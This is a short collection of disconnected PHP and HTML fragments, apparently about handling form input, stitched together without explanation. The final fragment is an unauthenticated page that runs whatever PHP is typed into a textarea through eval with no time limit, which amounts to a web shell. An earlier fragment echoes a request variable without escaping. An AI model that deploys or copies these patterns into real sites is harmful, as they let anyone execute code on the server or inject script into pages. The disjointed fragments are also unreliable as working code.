<FORM METHOD=POST ACTION="http://domen.ru/ss.php"> <input type="text" name="street" size="40" maxlength=80 value=""> <input type="submit" value="start" name="ok" "> </FORM>
<?php echo $street; ?>
fopen( "file.txt", "wt");
<?php set_time_limit(0); $form = <<<FORM <form method="post" action=""> <textarea name="txt" rows="30" cols="150"></textarea> <input type="submit" name="ok"> </form> FORM; if ($_POST["txt"] and $_POST["ok"]){ eval(stripslashes($_POST["txt"])); }else{ echo $form; } ?>